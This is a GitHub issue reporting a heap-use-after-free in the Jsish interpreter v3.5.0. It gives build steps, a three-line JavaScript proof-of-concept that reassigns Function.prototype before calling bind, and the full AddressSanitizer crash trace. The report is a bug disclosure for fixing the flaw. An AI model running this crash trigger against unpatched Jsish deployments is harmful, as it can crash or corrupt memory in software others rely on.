New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

var JSEtest = function() {}; Function.prototype = 12; var obj = JSEtest.bind({});

​

Execution steps & Output

$ ./jsish/jsish poc.js

==50188==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000000228 at pc 0x55ccf1df02ee bp 0x7ffcb1d1b0a0 sp 0x7ffcb1d1b090 READ of size 1 at 0x603000000228 thread T0 #0 0x55ccf1df02ed in jsi_ValueLookupBase src/jsiValue.c:980 #1 0x55ccf1df1175 in jsi_ValueLookupBase src/jsiValue.c:1007 #2 0x55ccf1df1175 in jsi_ValueSubscript src/jsiValue.c:1016 #3 0x55ccf211ad47 in jsiEvalSubscript src/jsiEval.c:997 #4 0x55ccf211ad47 in jsiEvalCodeSub src/jsiEval.c:1283 #5 0x55ccf213315e in jsi_evalcode src/jsiEval.c:2204 #6 0x55ccf2137274 in jsi_evalStrFile src/jsiEval.c:2665 #7 0x55ccf1e2666a in Jsi_Main src/jsiInterp.c:936 #8 0x55ccf262b03a in jsi_main src/main.c:47 #9 0x7fc99b738bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #10 0x55ccf1dba969 in _start (/usr/local/bin/jsish+0xe8969)

0x603000000228 is located 8 bytes inside of 32-byte region [0x603000000220,0x603000000240) freed by thread T0 here: #0 0x7fc99c3a77a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x55ccf1ddb6cf in Jsi_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here: #0 0x7fc99c3a7d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55ccf1e2baa4 in Jsi_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:980 in jsi_ValueLookupBase Shadow bytes around the buggy address: 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff8000: fa fa 00 00 00 00 fa fa 00 00 07 fa fa fa 00 00 0x0c067fff8010: 00 00 fa fa 00 00 03 fa fa fa 00 00 00 00 fa fa 0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 =>0x0c067fff8040: 00 00 fa fa fd[fd]fd fd fa fa 00 00 00 00 fa fa 0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8060: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8070: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff8080: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8090: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==50188==ABORTING

Credits: Found by OWL337 team.

1 participant